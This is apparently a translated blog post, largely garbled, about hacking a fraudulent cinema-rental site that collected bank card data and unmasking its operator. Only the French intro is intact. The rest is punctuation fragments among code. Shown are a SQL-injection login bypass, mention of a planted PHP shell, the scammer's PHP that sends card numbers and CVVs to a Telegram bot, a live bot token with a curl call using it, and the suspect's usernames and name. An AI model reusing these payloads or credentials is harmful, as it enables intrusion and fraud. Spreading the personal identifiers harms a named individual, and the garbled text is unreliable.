Annotation
Chacun de nous peut devenir victime d'un attaquant, mais parfois les prédateurs et les proies changent de place.
Il s'agit d'une courte histoire sur la façon dont une mauvaise utilisation de la technologie peut conduire à la divulgation de la personnalité. L'article sera utile à la fois aux jeunes hackers qui veulent obtenir de "l'argent facile" et à ceux qui veulent les attraper.
Présentation
Un soir de février, j'étais occupé à chercher un endroit pour un rendez-vous romantique avec mon amant. Après un certain temps, mon attention a été attirée sur le site
milleniumfilm.ru , qui n'est actuellement pas disponible. Le site a fourni des services de location de petites salles de cinéma pour une visualisation privée. De belles images, des prix raisonnables, il y a un support en ligne, mais une chose: il a été proposé de saisir les données de la carte bancaire sur une page non protégée du même domaine. Prudent, j'ai écrit au support technique du site, et les escrocs n'ont pas mis longtemps à attendre - réalisant que j'étais assez compétent techniquement ils m'ont envoyé 3 lettres. Bien sûr, les escrocs n'ont pas de sens de perdre du temps sur moi, mais pourquoi si grossier? - Dans toutes les situations, vous devez rester un homme.
Vous pouvez trouver des critiques sur les sites du même plan ici:
zhaloba-online.ru . Certains d'entre eux fonctionnent même encore.
Piratage
Ressentant l'injustice universelle, afin d'établir l'identité de l'attaquant et de réprimer ses activités, j'ai commencé à étudier le site pour détecter les vulnérabilités.
En pointant du doigt le ciel, la première adresse que j'ai entrée m'a conduit au
panneau d'administration , qui m'a poliment demandé d'indiquer «Login» et «Password».
La première tentative d'injection SQL Le premier mot de passe qui me vient à l'esprit
1' or '1
.
., .
Gelloiss.ru . « » — : , , , cvc2 .
., 3D-secure, . , . , 3D-secure . , , .
« » - . , php-shell.
/images/,
login.php. , .
telegram.php.
.$ cat telegram.php
<?
function send_mess($text) {
$token = "626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs";
$mess = $text;
$chat = "-302359340";
/*return "<iframe style='width:500px; height:500px;' src='https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess."'></iframe>";*/
file_get_contents("https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess);
}
PHP - send_mess. , - , .
grep./cart.php:22:send_mess(" : ".$name."%0D%0AEmail: ".$email."%0D%0A: ".$phone."%0D%0A : ".$date."%0D%0A".": ".$time."%0D%0A: ".$city."%0D%0A: ".$sum."%0D%0A : ".$services."%0D%0AIP: ".$ip."%0D%0A: ".$link_ban_ip);
./pay/ms.php:21: send_mess(": ".$sum."%0D%0A : ".$name."%0D%0A : ".$num."%0D%0A , : ".$month."%0D%0A: ".$year."%0D%0Acvv: ".$cvv);
, -, chat_id, skype «ura7887» telegram «Gelloiss» ( telegram , telegram-
).
, , .
curl$ curl "https://api.telegram.org/bot626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs/getChatAdministrators?chat_id=-302359340"
{"ok":true,"result":[{"user":{"id":365019332,"is_bot":false,"first_name":"Iskr\u00e1","username":"Gelloiss","language_code":"ru"},"status":"creator"}]}
username — «gelloiss».
: ! : «gelloiss», «ura7887»,
, «Gelloiss.ru», skype «ura7887».
:
vk.com , 6 , 14 .
anime.anidub.com.
blackhacker.ru, .
telegram
,
Gelloiss.ru telegram, telegram- . , telegram- .
shell$ sha256sum <<< "i'm carder yuri iskra."
a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8 -
telegram :
a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8 .
, . , 100 , +100.
, «». « »
.
, . : 3 - 13 . , - , 2 . , , . ,
moneyonline.world.
Update 2019-04-21:
gelloiss , , , telegram:
Message(id=31, grouped_id=None, from_id=898775249, edit_date=None, message=' « » ', to_id=PeerUser(user_id=365019332), entities=[], fwd_from=None, views=None, media=None, post=False, media_unread=False, out=True, date=datetime.datetime(2019, 4, 19, 9, 36, 15, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),
Message(id=33, grouped_id=None, from_id=365019332, edit_date=None, message='moneyonline.world/pay/?pay=123\n ?)) \n ', to_id=PeerUser(user_id=898775249), entities=[MessageEntityUrl(offset=0, length=38)], fwd_from=None, views=None, media=MessageMediaWebPage(webpage=WebPage(id=8004451420650727228, hash=0, photo=None, description='MoneyOnline.com ‒ , . , , . , .', embed_height=None, embed_width=None, document=None, embed_type=None, site_name='MoneyOnline', cached_page=None, url='https://moneyonline.world/pay/?pay=123', display_url='moneyonline.world/ru', duration=None, author=None, embed_url=None, title='MoneyOnline | , , ', type='article')), post=False, media_unread=False, out=False, date=datetime.datetime(2019, 4, 19, 9, 37, 53, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),